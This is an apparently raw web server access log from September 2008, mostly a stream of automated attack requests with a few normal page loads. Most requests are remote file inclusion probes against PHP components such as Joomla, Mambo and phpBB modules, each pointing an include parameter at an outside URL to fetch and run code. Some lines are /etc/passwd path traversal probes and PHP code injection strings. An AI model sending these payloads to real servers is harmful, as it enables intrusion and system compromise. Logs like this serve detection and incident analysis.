122.201.81.53 - - [07/Sep/2008:04:55:59 -0400] "GET /?sourcedir=http://willsponsor.org/.cgi/psy-bnc??? HTTP/1.1" 200 9432
122.201.81.53 - - [07/Sep/2008:04:55:59 -0400] "GET /log/?sourcedir=http://willsponsor.org/.cgi/psy-bnc??? HTTP/1.1" 200 57842
216.12.80.220 - - [07/Sep/2008:04:59:09 -0400] "GET /log/sdaglobal.org-access_log/?sourcedir=http://www.fullscores.com/mambots/poll/osid6.txt?? HTTP/1.1" 404 310
216.12.80.220 - - [07/Sep/2008:04:59:10 -0400] "GET /?sourcedir=http://www.fullscores.com/mambots/poll/osid6.txt?? HTTP/1.1" 200 9432
216.12.80.220 - - [07/Sep/2008:04:59:10 -0400] "GET /log/?sourcedir=http://www.fullscores.com/mambots/poll/osid6.txt?? HTTP/1.1" 200 57845
88.116.96.124 - - [07/Sep/2008:04:59:45 -0400] "GET //authentication/smf/smf.functions.php?pConfig_auth[smf_path]=http://ich-lebe.de/images/stories/stories/botid.txt? HTTP/1.1" 404 318
203.146.102.38 - - [07/Sep/2008:05:00:45 -0400] "GET /log/sdaglobal.org-access_log/errors.php?error=http://www.infernalis.de/cms/administrator/components/com_weblinks/.%20/.bash/id.txt? HTTP/1.1" 404 320
72.55.156.116 - - [07/Sep/2008:05:01:19 -0400] "GET //newspublish/include.php?path%5Bdocroot%5D=http://rock.ge/images/V7ID.txt??? HTTP/1.1" 404 305
72.55.156.116 - - [07/Sep/2008:05:01:19 -0400] "GET /log/sdaglobal.org-access_log//newspublish/include.php?path%5Bdocroot%5D=http://rock.ge/images/V7ID.txt??? HTTP/1.1" 404 334
72.55.156.116 - - [07/Sep/2008:05:01:19 -0400] "GET /log//newspublish/include.php?path%5Bdocroot%5D=http://rock.ge/images/V7ID.txt??? HTTP/1.1" 404 309
72.55.156.116 - - [07/Sep/2008:05:01:29 -0400] "GET /log/sdaglobal.org-error_log.1//newspublish/include.php?path%5Bdocroot%5D=http://rock.ge/images/V7ID.txt??? HTTP/1.1" 404 335
140.174.118.146 - - [07/Sep/2008:05:01:30 -0400] "GET /log/sdaglobal.org-access_log//index.php?option=com_lurm_constructor&Itemid=&mosConfig_absolute_path=http://208.46.111.12/images/images.txt?? HTTP/1.0" 404 320
140.174.118.146 - - [07/Sep/2008:05:01:30 -0400] "GET //index.php?option=com_lurm_constructor&Itemid=&mosConfig_absolute_path=http://208.46.111.12/images/images.txt?? HTTP/1.0" 404 291
140.174.118.146 - - [07/Sep/2008:05:01:30 -0400] "GET /log//index.php?option=com_lurm_constructor&Itemid=&mosConfig_absolute_path=http://208.46.111.12/images/images.txt?? HTTP/1.0" 404 295
66.7.207.104 - - [07/Sep/2008:05:01:52 -0400] "GET /log/sdaglobal.org-access_log//index.php?option=com_lurm_constructor&Itemid=&mosConfig_absolute_path=http://208.46.111.12/images/images.txt?? HTTP/1.1" 404 320
66.7.207.104 - - [07/Sep/2008:05:01:52 -0400] "GET //index.php?option=com_lurm_constructor&Itemid=&mosConfig_absolute_path=http://208.46.111.12/images/images.txt?? HTTP/1.1" 404 291
66.7.207.104 - - [07/Sep/2008:05:01:52 -0400] "GET /log//index.php?option=com_lurm_constructor&Itemid=&mosConfig_absolute_path=http://208.46.111.12/images/images.txt?? HTTP/1.1" 404 295
66.103.128.44 - - [07/Sep/2008:05:03:01 -0400] "GET /?sourcedir=http://weblime.ru/seahorse/mambo??? HTTP/1.1" 200 9432
66.103.128.44 - - [07/Sep/2008:05:03:03 -0400] "GET /log/?sourcedir=http://weblime.ru/seahorse/mambo??? HTTP/1.1" 200 57851
151.11.24.250 - - [07/Sep/2008:05:03:12 -0400] "GET /log/sdaglobal.org-access_log/?sourcedir=http://www.fullscores.com/mambots/poll/osid6.txt?? HTTP/1.1" 404 310
151.11.24.250 - - [07/Sep/2008:05:03:12 -0400] "GET /?sourcedir=http://www.fullscores.com/mambots/poll/osid6.txt?? HTTP/1.1" 200 9432
151.11.24.250 - - [07/Sep/2008:05:03:12 -0400] "GET /log/?sourcedir=http://www.fullscores.com/mambots/poll/osid6.txt?? HTTP/1.1" 200 57851
123.202.64.95 - - [07/Sep/2008:05:03:28 -0400] "GET /images/chinese.gif HTTP/1.1" 200 3578
123.202.64.95 - - [07/Sep/2008:05:03:28 -0400] "GET /images/china.gif HTTP/1.1" 200 3479
66.7.207.104 - - [07/Sep/2008:05:03:52 -0400] "GET /log//index.php?option=com_lurm_constructor&Itemid=&mosConfig_absolute_path=http://208.46.111.12/images/images.txt?? HTTP/1.1" 404 295
66.7.207.104 - - [07/Sep/2008:05:03:52 -0400] "GET //index.php?option=com_lurm_constructor&Itemid=&mosConfig_absolute_path=http://208.46.111.12/images/images.txt?? HTTP/1.1" 404 291
66.7.207.104 - - [07/Sep/2008:05:04:11 -0400] "GET //index.php?option=com_lurm_constructor&Itemid=&mosConfig_absolute_path=http://208.46.111.12/images/images.txt?? HTTP/1.1" 404 291
74.6.22.103 - - [07/Sep/2008:05:04:14 -0400] "GET /log/kowloon.sdaglobal.org-access_log.4 HTTP/1.0" 200 47803
140.174.118.146 - - [07/Sep/2008:05:04:28 -0400] "GET //index.php?option=com_lurm_constructor&Itemid=&mosConfig_absolute_path=http://208.46.111.12/images/images.txt?? HTTP/1.0" 404 291
205.211.11.1 - - [07/Sep/2008:05:05:31 -0400] "GET /log/errors.php?error=http://waktu.hut2.ru/aDu/id.txt????? HTTP/1.1" 404 295
205.211.11.1 - - [07/Sep/2008:05:05:31 -0400] "GET /errors.php?error=http://waktu.hut2.ru/aDu/id.txt????? HTTP/1.1" 404 291
140.174.118.146 - - [07/Sep/2008:05:06:51 -0400] "GET /log//index.php?option=com_lurm_constructor&Itemid=&mosConfig_absolute_path=http://208.46.111.12/images/images.txt?? HTTP/1.0" 404 295
140.174.118.146 - - [07/Sep/2008:05:06:52 -0400] "GET //index.php?option=com_lurm_constructor&Itemid=&mosConfig_absolute_path=http://208.46.111.12/images/images.txt?? HTTP/1.0" 404 291
217.160.189.11 - - [07/Sep/2008:05:08:33 -0400] "GET //forum/?sourcedir=http://www.unixserv.net/alba.txt? HTTP/1.1" 404 288
62.87.154.41 - - [07/Sep/2008:05:08:43 -0400] "GET /log/sdaglobal.org-access_log/?sourcedir=http://indocairo.net/id.txt?? HTTP/1.1" 404 310
62.87.154.41 - - [07/Sep/2008:05:08:44 -0400] "GET /?sourcedir=http://indocairo.net/id.txt?? HTTP/1.1" 200 9432
62.87.154.41 - - [07/Sep/2008:05:08:44 -0400] "GET /log/?sourcedir=http://indocairo.net/id.txt?? HTTP/1.1" 200 57860
62.87.154.41 - - [07/Sep/2008:05:09:34 -0400] "GET /log/sdaglobal.org-access_log/?sourcedir=http://indocairo.net/id.txt?? HTTP/1.1" 404 310
62.87.154.41 - - [07/Sep/2008:05:09:35 -0400] "GET /?sourcedir=http://indocairo.net/id.txt?? HTTP/1.1" 200 9432
62.87.154.41 - - [07/Sep/2008:05:09:37 -0400] "GET /log/?sourcedir=http://indocairo.net/id.txt?? HTTP/1.1" 200 57860
216.180.251.34 - - [07/Sep/2008:05:11:23 -0400] "GET /log/sdaglobal.org-access_log.1//admin/spaw/spaw_control.class.php?spaw_root=http://socomalliance.com/Ladders/sistem.txt? HTTP/1.1" 404 346
216.180.251.34 - - [07/Sep/2008:05:11:23 -0400] "GET //admin/spaw/spaw_control.class.php?spaw_root=http://socomalliance.com/Ladders/sistem.txt? HTTP/1.1" 404 315
216.180.251.34 - - [07/Sep/2008:05:11:23 -0400] "GET /log//admin/spaw/spaw_control.class.php?spaw_root=http://socomalliance.com/Ladders/sistem.txt? HTTP/1.1" 404 319
216.180.251.34 - - [07/Sep/2008:05:11:29 -0400] "GET /log/sdaglobal.org-access_log//admin/spaw/spaw_control.class.php?spaw_root=http://socomalliance.com/Ladders/sistem.txt? HTTP/1.1" 404 344
216.180.251.34 - - [07/Sep/2008:05:13:33 -0400] "GET //admin/spaw/spaw_control.class.php?spaw_root=http://socomalliance.com/Ladders/sistem.txt? HTTP/1.1" 404 315
81.171.86.86 - - [07/Sep/2008:05:13:40 -0400] "GET //components/com_thopper/inc/itemstatus_type.php?mosConfig_absolute_path=http://www.snapshotjourneys.com/lib/adodb_lite/wing.jpg?? HTTP/1.1" 404 328
216.12.80.220 - - [07/Sep/2008:05:14:03 -0400] "GET /log/sdaglobal.org-access_log.1/?sourcedir=http://www.fullscores.com/mambots/poll/osid6.txt?? HTTP/1.1" 404 312
72.55.156.116 - - [07/Sep/2008:05:14:50 -0400] "GET /log/sdaglobal.org-access_log.1/components/com_colorlab/admin.color.php?mosConfig_live_site=http://rock.ge/images/V7ID.txt??? HTTP/1.1" 404 351
72.55.156.116 - - [07/Sep/2008:05:14:50 -0400] "GET /log/components/com_colorlab/admin.color.php?mosConfig_live_site=http://rock.ge/images/V7ID.txt??? HTTP/1.1" 404 324
72.55.156.116 - - [07/Sep/2008:05:14:50 -0400] "GET /components/com_colorlab/admin.color.php?mosConfig_live_site=http://rock.ge/images/V7ID.txt??? HTTP/1.1" 404 320
72.55.156.116 - - [07/Sep/2008:05:15:10 -0400] "GET /log/sdaglobal.org-error_log.3/components/com_colorlab/admin.color.php?mosConfig_live_site=http://rock.ge/images/V7ID.txt??? HTTP/1.1" 404 350
217.128.122.28 - - [07/Sep/2008:05:16:17 -0400] "GET //convert/mvcw.php?step=1&vwar_root=http://www.ballettschule-tulln.at/htaccess/t.txt??? HTTP/1.1" 404 298
217.128.122.28 - - [07/Sep/2008:05:16:17 -0400] "GET /log//convert/mvcw.php?step=1&vwar_root=http://www.ballettschule-tulln.at/htaccess/t.txt??? HTTP/1.1" 404 302
82.194.86.185 - - [07/Sep/2008:05:16:50 -0400] "GET /log/sdaglobal.org-error_log.3///vwar/backup/errors.php?error=http://www.spd-esens.de/spd/contentimage/readme1.txt?? HTTP/1.1" 404 335
82.194.86.185 - - [07/Sep/2008:05:16:51 -0400] "GET ///vwar/backup/errors.php?error=http://www.spd-esens.de/spd/contentimage/readme1.txt?? HTTP/1.1" 404 305
82.194.86.185 - - [07/Sep/2008:05:16:51 -0400] "GET /log///vwar/backup/errors.php?error=http://www.spd-esens.de/spd/contentimage/readme1.txt?? HTTP/1.1" 404 309
72.55.156.116 - - [07/Sep/2008:05:17:35 -0400] "GET /log/sdaglobal.org-error_log.3%20/components/com_colorlab/admin.color.php?mosConfig_live_site=http://rock.ge/images/V7ID.txt??? HTTP/1.1" 404 351
61.6.149.141 - - [07/Sep/2008:05:17:45 -0400] "GET / HTTP/1.1" 304 -
217.160.189.11 - - [07/Sep/2008:05:17:49 -0400] "GET /log/sdaglobal.org-access_log//forum/?sourcedir=http://www.unixserv.net/alba.txt? HTTP/1.1" 404 317
217.160.189.11 - - [07/Sep/2008:05:17:49 -0400] "GET /log//forum/?sourcedir=http://www.unixserv.net/alba.txt? HTTP/1.1" 404 292
61.6.149.141 - - [07/Sep/2008:05:17:55 -0400] "GET /_themes/sda/lebkgnd.jpg HTTP/1.1" 304 -
61.6.149.141 - - [07/Sep/2008:05:17:55 -0400] "GET /_derived/index.html_cmp_sda010_bnr.gif HTTP/1.1" 304 -
122.201.81.53 - - [07/Sep/2008:05:18:14 -0400] "GET /log/sdaglobal.org-access_log.1/?sourcedir=http://www.aquaentellius.com/readme1.txt????? HTTP/1.1" 404 312
122.201.81.53 - - [07/Sep/2008:05:18:14 -0400] "GET /?sourcedir=http://www.aquaentellius.com/readme1.txt????? HTTP/1.1" 200 9432
122.201.81.53 - - [07/Sep/2008:05:18:14 -0400] "GET /log/?sourcedir=http://www.aquaentellius.com/readme1.txt????? HTTP/1.1" 200 57860
122.201.81.53 - - [07/Sep/2008:05:18:43 -0400] "GET /log/sdaglobal.org-access_log/?sourcedir=http://www.aquaentellius.com/readme1.txt????? HTTP/1.1" 404 310
202.142.212.1 - - [07/Sep/2008:05:19:12 -0400] "GET /log/sdaglobal.org-access_log.1///vwar/backup/errors.php?error=http://wp1004891.wp009.webpack.hosteurope.de/otto/readme1.txt? HTTP/1.1" 404 336
202.142.212.1 - - [07/Sep/2008:05:19:17 -0400] "GET ///vwar/backup/errors.php?error=http://wp1004891.wp009.webpack.hosteurope.de/otto/readme1.txt? HTTP/1.1" 404 305
202.142.212.1 - - [07/Sep/2008:05:19:23 -0400] "GET /log///vwar/backup/errors.php?error=http://wp1004891.wp009.webpack.hosteurope.de/otto/readme1.txt? HTTP/1.1" 404 309
81.171.86.86 - - [07/Sep/2008:05:20:37 -0400] "GET /ktmlpro/includes/ktedit/toolbar.php?dirDepth=http://www.snapshotjourneys.com/lib/adodb_lite/wing.jpg?? HTTP/1.1" 404 316
202.142.212.1 - - [07/Sep/2008:05:21:04 -0400] "GET /log/sdaglobal.org-access_log///vwar/backup/errors.php?error=http://wp1004891.wp009.webpack.hosteurope.de/otto/readme1.txt? HTTP/1.1" 404 334
216.17.96.15 - - [07/Sep/2008:05:24:08 -0400] "GET //index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 291
216.17.96.15 - - [07/Sep/2008:05:24:08 -0400] "GET /log/sdaglobal.org-access_log.1//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 322
216.17.96.15 - - [07/Sep/2008:05:24:08 -0400] "GET /log//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 295
202.142.212.1 - - [07/Sep/2008:05:25:32 -0400] "GET ///vwar/backup/errors.php?error=http://wp1004891.wp009.webpack.hosteurope.de/otto/readme1.txt? HTTP/1.1" 404 305
61.6.149.141 - - [07/Sep/2008:05:25:59 -0400] "GET / HTTP/1.1" 304 -
61.6.149.141 - - [07/Sep/2008:05:26:02 -0400] "GET /_themes/sda/lebkgnd.jpg HTTP/1.1" 304 -
61.6.149.141 - - [07/Sep/2008:05:26:02 -0400] "GET /_derived/index.html_cmp_sda010_bnr.gif HTTP/1.1" 304 -
61.6.149.141 - - [07/Sep/2008:05:26:04 -0400] "GET /images/welcome.gif HTTP/1.1" 304 -
61.6.149.141 - - [07/Sep/2008:05:26:04 -0400] "GET /images/select.gif HTTP/1.1" 304 -
61.6.149.141 - - [07/Sep/2008:05:26:06 -0400] "GET /images/chinese.gif HTTP/1.1" 206 2429
61.6.149.141 - - [07/Sep/2008:05:26:06 -0400] "GET /images/english.gif HTTP/1.1" 304 -
81.171.86.86 - - [07/Sep/2008:05:26:25 -0400] "GET /log/sdaglobal.org-error_log//components/com_thopper/inc/itemstatus_type.php?mosConfig_absolute_path=http://www.snapshotjourneys.com/lib/adodb_lite/wing.jpg?? HTTP/1.1" 404 356
81.171.86.86 - - [07/Sep/2008:05:26:25 -0400] "GET //components/com_thopper/inc/itemstatus_type.php?mosConfig_absolute_path=http://www.snapshotjourneys.com/lib/adodb_lite/wing.jpg?? HTTP/1.1" 404 328
81.171.86.86 - - [07/Sep/2008:05:26:25 -0400] "GET /log//components/com_thopper/inc/itemstatus_type.php?mosConfig_absolute_path=http://www.snapshotjourneys.com/lib/adodb_lite/wing.jpg?? HTTP/1.1" 404 332
81.171.86.86 - - [07/Sep/2008:05:26:27 -0400] "GET /mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://www.snapshotjourneys.com/lib/adodb_lite/wing.jpg?? HTTP/1.1" 404 322
81.171.86.86 - - [07/Sep/2008:05:28:02 -0400] "GET /ray.3.5/modules/global/inc/content.inc.php?sIncPath=http://www.snapshotjourneys.com/lib/adodb_lite/wing.jpg?? HTTP/1.1" 404 323
81.171.86.86 - - [07/Sep/2008:05:28:27 -0400] "GET /components/com_joomlalib/standalone/stubjambo.php?baseDir=http://www.snapshotjourneys.com/lib/adodb_lite/wing.jpg?? HTTP/1.1" 404 330
203.146.102.38 - - [07/Sep/2008:05:28:55 -0400] "GET /errors.php?error=http://www.infernalis.de/cms/administrator/components/com_weblinks/.%20/.bash/id.txt? HTTP/1.1" 404 291
81.171.86.86 - - [07/Sep/2008:05:29:29 -0400] "GET /log/sdaglobal.org-error_log.4//components/com_thopper/inc/itemstatus_type.php?mosConfig_absolute_path=http://www.snapshotjourneys.com/lib/adodb_lite/wing.jpg?? HTTP/1.1" 404 358
61.6.149.141 - - [07/Sep/2008:05:31:41 -0400] "GET / HTTP/1.1" 304 -
61.6.149.141 - - [07/Sep/2008:05:31:42 -0400] "GET /_themes/sda/lebkgnd.jpg HTTP/1.1" 304 -
61.6.149.141 - - [07/Sep/2008:05:31:42 -0400] "GET /_derived/index.html_cmp_sda010_bnr.gif HTTP/1.1" 304 -
61.6.149.141 - - [07/Sep/2008:05:31:44 -0400] "GET /images/english.gif HTTP/1.1" 304 -
61.6.149.141 - - [07/Sep/2008:05:31:44 -0400] "GET /images/welcome.gif HTTP/1.1" 304 -
61.6.149.141 - - [07/Sep/2008:05:31:47 -0400] "GET /images/select.gif HTTP/1.1" 304 -
61.6.149.141 - - [07/Sep/2008:05:31:47 -0400] "GET /images/chinese.gif HTTP/1.1" 304 -
81.171.86.86 - - [07/Sep/2008:05:32:22 -0400] "GET /log/sdaglobal.org-error_log.1/ktmlpro/includes/ktedit/toolbar.php?dirDepth=http://www.snapshotjourneys.com/lib/adodb_lite/wing.jpg?? HTTP/1.1" 404 346
81.171.86.86 - - [07/Sep/2008:05:32:22 -0400] "GET /ktmlpro/includes/ktedit/toolbar.php?dirDepth=http://www.snapshotjourneys.com/lib/adodb_lite/wing.jpg?? HTTP/1.1" 404 316
81.171.86.86 - - [07/Sep/2008:05:32:22 -0400] "GET /log/ktmlpro/includes/ktedit/toolbar.php?dirDepth=http://www.snapshotjourneys.com/lib/adodb_lite/wing.jpg?? HTTP/1.1" 404 320
216.17.96.15 - - [07/Sep/2008:05:33:22 -0400] "GET //mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 323
216.17.96.15 - - [07/Sep/2008:05:33:22 -0400] "GET /log/sdaglobal.org-access_log.1//mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 354
216.17.96.15 - - [07/Sep/2008:05:33:22 -0400] "GET /log//mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 327
85.92.71.151 - - [07/Sep/2008:05:34:36 -0400] "GET //convert/mvcw.php?step=1&vwar_root=http://www.ballettschule-tulln.at/htaccess/colins.txt?? HTTP/1.1" 404 298
85.92.71.151 - - [07/Sep/2008:05:34:39 -0400] "GET /log/sdaglobal.org-access_log//convert/mvcw.php?step=1&vwar_root=http://www.ballettschule-tulln.at/htaccess/colins.txt?? HTTP/1.1" 404 327
85.92.71.151 - - [07/Sep/2008:05:34:39 -0400] "GET /log//convert/mvcw.php?step=1&vwar_root=http://www.ballettschule-tulln.at/htaccess/colins.txt?? HTTP/1.1" 404 302
81.171.86.86 - - [07/Sep/2008:05:35:22 -0400] "GET /log/sdaglobal.org-error_log.3/ktmlpro/includes/ktedit/toolbar.php?dirDepth=http://www.snapshotjourneys.com/lib/adodb_lite/wing.jpg?? HTTP/1.1" 404 346
82.194.86.185 - - [07/Sep/2008:05:37:28 -0400] "GET /log/sdaglobal.org-error_log.3///vwar/backup/errors.php?error=http://www.spd-esens.de/spd/contentimage/readme1.txt?? HTTP/1.1" 404 335
82.194.86.185 - - [07/Sep/2008:05:37:29 -0400] "GET ///vwar/backup/errors.php?error=http://www.spd-esens.de/spd/contentimage/readme1.txt?? HTTP/1.1" 404 305
82.194.86.185 - - [07/Sep/2008:05:37:29 -0400] "GET /log///vwar/backup/errors.php?error=http://www.spd-esens.de/spd/contentimage/readme1.txt?? HTTP/1.1" 404 309
62.140.19.17 - - [07/Sep/2008:05:38:39 -0400] "GET /admin/addons/archive/archive.php?adminfolder=http://www.spelletjeslog.nl/templates/js_matrix_3/images/thumb.png/boo.do??? HTTP/1.1" 404 313
62.140.19.17 - - [07/Sep/2008:05:38:48 -0400] "GET /log/admin/addons/archive/archive.php?adminfolder=http://www.spelletjeslog.nl/templates/js_matrix_3/images/thumb.png/boo.do??? HTTP/1.1" 404 317
85.92.71.151 - - [07/Sep/2008:05:39:10 -0400] "GET /log/sdaglobal.org-access_log.1//convert/mvcw.php?step=1&vwar_root=http://www.ballettschule-tulln.at/htaccess/colins.txt?? HTTP/1.1" 404 329
217.20.138.101 - - [07/Sep/2008:05:39:51 -0400] "GET /log/sdaglobal.org-access_log//includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://socomalliance.com/Ladders/sistem.txt? HTTP/1.1" 404 339
217.20.138.101 - - [07/Sep/2008:05:39:51 -0400] "GET //includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://socomalliance.com/Ladders/sistem.txt? HTTP/1.1" 404 310
217.20.138.101 - - [07/Sep/2008:05:39:52 -0400] "GET /log//includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://socomalliance.com/Ladders/sistem.txt? HTTP/1.1" 404 314
61.6.149.141 - - [07/Sep/2008:05:40:20 -0400] "GET / HTTP/1.1" 304 -
202.142.212.1 - - [07/Sep/2008:05:42:04 -0400] "GET /log/sdaglobal.org-access_log.1///vwar/backup/errors.php?error=http://wp1004891.wp009.webpack.hosteurope.de/otto/readme1.txt? HTTP/1.1" 404 336
202.142.212.1 - - [07/Sep/2008:05:42:09 -0400] "GET ///vwar/backup/errors.php?error=http://wp1004891.wp009.webpack.hosteurope.de/otto/readme1.txt? HTTP/1.1" 404 305
202.142.212.1 - - [07/Sep/2008:05:42:15 -0400] "GET /log///vwar/backup/errors.php?error=http://wp1004891.wp009.webpack.hosteurope.de/otto/readme1.txt? HTTP/1.1" 404 309
217.20.138.101 - - [07/Sep/2008:05:42:34 -0400] "GET /log//includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://socomalliance.com/Ladders/sistem.txt? HTTP/1.1" 404 314
217.20.138.101 - - [07/Sep/2008:05:42:34 -0400] "GET //includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://socomalliance.com/Ladders/sistem.txt? HTTP/1.1" 404 310
217.20.138.101 - - [07/Sep/2008:05:43:29 -0400] "GET //includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://socomalliance.com/Ladders/sistem.txt? HTTP/1.1" 404 310
81.171.86.86 - - [07/Sep/2008:05:43:38 -0400] "GET /log/sdaglobal.org-error_log.3/mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://www.snapshotjourneys.com/lib/adodb_lite/wing.jpg?? HTTP/1.1" 404 352
81.171.86.86 - - [07/Sep/2008:05:43:38 -0400] "GET /mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://www.snapshotjourneys.com/lib/adodb_lite/wing.jpg?? HTTP/1.1" 404 322
81.171.86.86 - - [07/Sep/2008:05:43:38 -0400] "GET /log/mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://www.snapshotjourneys.com/lib/adodb_lite/wing.jpg?? HTTP/1.1" 404 326
202.142.212.1 - - [07/Sep/2008:05:43:58 -0400] "GET /log/sdaglobal.org-access_log///vwar/backup/errors.php?error=http://wp1004891.wp009.webpack.hosteurope.de/otto/readme1.txt? HTTP/1.1" 404 334
81.176.226.180 - - [07/Sep/2008:05:44:40 -0400] "GET /errors.php?error=http://www.ozwebfx.com/articledirectory/demonstration/backup/id.txt??? HTTP/1.1" 404 291
81.176.226.180 - - [07/Sep/2008:05:44:40 -0400] "GET /log/errors.php?error=http://www.ozwebfx.com/articledirectory/demonstration/backup/id.txt??? HTTP/1.1" 404 295
81.176.226.180 - - [07/Sep/2008:05:44:40 -0400] "GET /log/sdaglobal.org-error_log.4/errors.php?error=http://www.ozwebfx.com/articledirectory/demonstration/backup/id.txt??? HTTP/1.1" 404 321
81.176.226.180 - - [07/Sep/2008:05:44:40 -0400] "GET /log/sdaglobal.org-error_log.4/errors.php?error=http://www.ozwebfx.com/articledirectory/demonstration/backup/id.txt??? HTTP/1.1" 404 321
81.176.226.180 - - [07/Sep/2008:05:44:40 -0400] "GET /log/errors.php?error=http://www.ozwebfx.com/articledirectory/demonstration/backup/id.txt??? HTTP/1.1" 404 295
81.176.226.180 - - [07/Sep/2008:05:44:40 -0400] "GET /errors.php?error=http://www.ozwebfx.com/articledirectory/demonstration/backup/id.txt??? HTTP/1.1" 404 291
122.201.81.53 - - [07/Sep/2008:05:44:52 -0400] "GET /log//convert/mvcw.php?step=1&vwar_root=http://willsponsor.org/.cgi/psy-bnc??? HTTP/1.1" 404 302
122.201.81.53 - - [07/Sep/2008:05:44:52 -0400] "GET //convert/mvcw.php?step=1&vwar_root=http://willsponsor.org/.cgi/psy-bnc??? HTTP/1.1" 404 298
209.250.238.63 - - [07/Sep/2008:05:44:59 -0400] "GET /log/sdaglobal.org-access_log.1/modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://www.geocities.com/scannersid/id.txt?? HTTP/1.1" 404 357
209.250.238.63 - - [07/Sep/2008:05:44:59 -0400] "GET /log/sdaglobal.org-access_log.1/modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://www.geocities.com/scannersid/id.txt?? HTTP/1.1" 404 357
209.250.238.63 - - [07/Sep/2008:05:44:59 -0400] "GET /modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://www.geocities.com/scannersid/id.txt?? HTTP/1.1" 404 326
209.250.238.63 - - [07/Sep/2008:05:44:59 -0400] "GET /modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://www.geocities.com/scannersid/id.txt?? HTTP/1.1" 404 326
209.250.238.63 - - [07/Sep/2008:05:44:59 -0400] "GET /log/modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://www.geocities.com/scannersid/id.txt?? HTTP/1.1" 404 330
209.250.238.63 - - [07/Sep/2008:05:44:59 -0400] "GET /log/modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://www.geocities.com/scannersid/id.txt?? HTTP/1.1" 404 330
209.250.238.63 - - [07/Sep/2008:05:45:03 -0400] "GET /log/sdaglobal.org-access_log.1/modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://www.geocities.com/scannersid/id.txt?? HTTP/1.1" 404 357
118.127.10.64 - - [07/Sep/2008:05:45:15 -0400] "GET /log/sdaglobal.org-access_log.1/modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://www.geocities.com/scannersid/id.txt?? HTTP/1.1" 404 357
118.127.10.64 - - [07/Sep/2008:05:45:15 -0400] "GET /log/sdaglobal.org-access_log.1/modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://www.geocities.com/scannersid/id.txt?? HTTP/1.1" 404 357
118.127.10.64 - - [07/Sep/2008:05:45:15 -0400] "GET /modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://www.geocities.com/scannersid/id.txt?? HTTP/1.1" 404 326
118.127.10.64 - - [07/Sep/2008:05:45:15 -0400] "GET /modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://www.geocities.com/scannersid/id.txt?? HTTP/1.1" 404 326
118.127.10.64 - - [07/Sep/2008:05:45:16 -0400] "GET /log/modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://www.geocities.com/scannersid/id.txt?? HTTP/1.1" 404 330
118.127.10.64 - - [07/Sep/2008:05:45:16 -0400] "GET /log/modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://www.geocities.com/scannersid/id.txt?? HTTP/1.1" 404 330
202.142.212.1 - - [07/Sep/2008:05:45:25 -0400] "GET ///vwar/backup/errors.php?error=http://wp1004891.wp009.webpack.hosteurope.de/otto/readme1.txt? HTTP/1.1" 404 305
217.20.138.101 - - [07/Sep/2008:05:45:48 -0400] "GET /log/sdaglobal.org-error_log.4//includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://socomalliance.com/Ladders/sistem.txt? HTTP/1.1" 404 340
81.171.86.86 - - [07/Sep/2008:05:46:22 -0400] "GET /log/sdaglobal.org-error_log/mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://www.snapshotjourneys.com/lib/adodb_lite/wing.jpg?? HTTP/1.1" 404 350
59.125.183.76 - - [07/Sep/2008:05:46:22 -0400] "GET /log/sdaglobal.org-access_log.1//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%27.include($_GET[a]),exit.%27&a=http://tomromeo.com/chitoz/lol.txt? HTTP/1.1" 404 322
